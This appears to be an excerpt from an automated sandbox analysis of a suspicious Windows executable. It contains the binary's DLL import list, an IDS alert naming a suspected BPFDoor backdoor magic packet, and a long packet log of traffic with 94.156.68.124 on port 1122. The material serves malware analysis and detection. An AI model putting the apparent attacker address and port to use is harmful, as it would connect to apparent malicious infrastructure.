                                  advapi32.dllRegUnLoadKeyW, RegSetValueExW, RegSaveKeyW, RegRestoreKeyW, RegReplaceKeyW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegLoadKeyW, RegFlushKey, RegEnumValueW, RegEnumKeyW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegConnectRegistryW, RegCloseKey
                                  kernel32.dllSleep
                                  oleaut32.dllSafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                  oleaut32.dllGetErrorInfo, SysFreeString
                                  ole32.dllCreateStreamOnHGlobal, ReleaseStgMedium, OleDraw, DoDragDrop, RevokeDragDrop, RegisterDragDrop, OleUninitialize, OleInitialize, CoTaskMemFree, CoTaskMemAlloc, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID
                                  comctl32.dllInitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_GetImageInfo, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Copy, ImageList_LoadImageW, ImageList_GetIcon, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_SetOverlayImage, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                  user32.dllEnumDisplayMonitors, GetMonitorInfoW, MonitorFromPoint, MonitorFromRect, MonitorFromWindow
                                  msvcrt.dllisxdigit, isupper, isspace, ispunct, isprint, islower, isgraph, isdigit, iscntrl, isalpha, isalnum, toupper, tolower, strchr, strncmp, memset, memcpy, memcmp
                                  shell32.dllShellExecuteW, Shell_NotifyIconW, DragQueryFileW
                                  comdlg32.dllPageSetupDlgW, PrintDlgW, GetSaveFileNameW, GetOpenFileNameW
                                  winspool.drvSetPrinterW, OpenPrinterW, GetPrinterW, GetDefaultPrinterW, EnumPrintersW, DocumentPropertiesW, DeviceCapabilitiesW, ClosePrinter
                                  winspool.drvGetDefaultPrinterW
                                  winmm.dlltimeGetTime
                                  d3d9.dllDirect3DCreate9
                                  NameOrdinalAddress
                                  TMethodImplementationIntercept30x4a3e00
                                  __dbk_fcall_wrapper20x417dd0
                                  dbkFCallWrapperAddr10xd72f58
                                  Language of compilation systemCountry where language is spokenMap
                                  EnglishUnited States
                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                  2024-09-25T01:11:15.400506+02002036752ET MALWARE Suspected BPFDoor TCP Magic Packet (Inbound)194.156.68.1241122192.168.2.749700TCP
                                  TimestampSource PortDest PortSource IPDest IP
                                  Sep 25, 2024 01:11:06.535291910 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:06.540110111 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:06.540177107 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:06.541223049 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:06.545996904 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:07.142668009 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:07.196496010 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:08.637633085 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:08.642725945 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:08.642851114 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:08.647969007 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:08.904171944 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:08.946643114 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.027724028 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.029014111 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.037669897 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.037789106 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.046909094 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.278578043 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.321579933 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.406683922 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.406927109 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.412122011 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.412169933 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.419455051 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.419507027 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.427220106 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.530698061 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.535556078 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.535715103 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.540501118 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.778626919 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.778768063 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.778815031 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.778825998 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.778865099 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.778937101 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.778947115 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.778950930 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.778964043 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.778997898 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.779405117 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.779449940 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.779462099 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.779491901 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.779510975 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.779547930 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.779911995 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.779954910 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.779968023 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.779993057 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.780011892 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.857651949 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.857671022 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.857752085 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.865639925 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.865672112 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.865684032 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.865755081 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.865799904 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.865844965 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.865904093 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.865957022 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.865968943 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.865998030 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.866127014 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.866139889 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.866152048 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.866173983 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.866187096 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.866854906 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.866894960 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.866908073 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.866955042 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.867079973 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.867091894 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.867104053 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.867120028 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.867145061 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.867815018 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.867860079 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.867872000 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.867902994 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.868025064 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.868036985 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.868047953 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.868067026 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.868110895 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.962227106 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.962261915 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.962282896 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.962295055 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.962366104 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.962438107 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.962450981 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.962462902 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.962476015 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.962496996 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.962518930 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.962671995 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.962790966 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.962802887 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.962822914 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.962951899 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.962963104 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.962975025 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.962985992 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.962987900 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.963001013 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.963219881 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.963253975 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.963439941 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.963516951 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.963551044 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.963553905 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.963694096 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.963707924 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.963720083 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.963748932 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.963779926 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.963846922 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.963859081 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.963912964 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.964350939 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.964411020 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.964422941 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.964453936 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.964607954 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.964618921 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.964638948 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.964643002 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.964652061 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.964675903 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.964848042 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.964889050 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.965282917 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.965354919 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.965365887 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.965394020 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.965501070 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.965512991 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.965537071 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.009076118 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.048923016 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.048953056 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.048964977 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.049010038 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.049156904 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.049169064 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.049182892 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.049194098 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.049204111 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.049206972 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.049221039 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.049247980 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.049447060 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.049496889 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.049499035 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.069067955 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.073843002 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.073898077 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.079624891 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.111020088 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.115880013 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.115938902 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.120829105 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.232408047 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.237251043 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.237301111 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.242645025 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.581315041 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.581677914 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.581692934 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.581706047 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.581748962 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.581799984 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.581841946 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.581855059 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.581867933 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.581907034 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.581926107 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.581964970 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.582026958 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.582048893 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.582084894 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.582185984 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.582199097 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.582233906 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.582329035 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.582344055 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.582376003 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.582449913 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.582499027 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.582509995 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.582532883 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.582704067 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.582736969 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.582745075 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.582747936 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.582781076 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.582952976 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.582978010 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.582988977 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.583010912 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.583065033 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.583110094 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.583201885 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.583214045 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.583257914 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.660351038 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.660387993 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.660398006 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.660410881 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.660486937 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.660500050 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.660574913 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.660574913 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.660574913 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.660600901 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.660655975 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.660711050 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.660744905 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.660758018 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.660768032 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.660821915 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.660983086 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.660995007 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.661021948 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.661039114 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.661092043 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.661160946 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.661174059 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.661206007 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.661308050 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.661320925 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.661333084 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.661344051 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.661355019 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.661380053 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.661547899 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.661650896 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.661663055 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.661685944 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.661755085 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.661792994 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.661865950 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.661940098 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.661952019 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.661983013 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.662130117 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.662142038 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.662154913 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.662168026 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.662169933 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.662198067 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.662364006 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.662408113 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.662472963 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.662484884 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.662497997 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.662520885 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.662791967 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.662831068 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.662842035 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.662853956 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.662897110 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.668432951 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.668466091 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.668478966 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.668509960 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.668622017 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.668634892 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.668648958 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.668659925 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.668662071 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.668699980 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.668868065 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.668909073 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.668919086 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.669001102 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.669013023 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.669023991 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.669049025 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.669071913 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.781631947 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.781651020 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.781663895 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.781704903 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.781717062 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.781729937 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.781729937 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.781743050 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.781774044 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.781935930 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.781980038 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.781982899 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.782037973 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.782074928 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.782150984 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.782164097 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.782176971 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.782193899 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.782270908 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.782310009 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.782346964 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.782360077 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.782403946 CEST497001122192.168.2.794.156.68.124
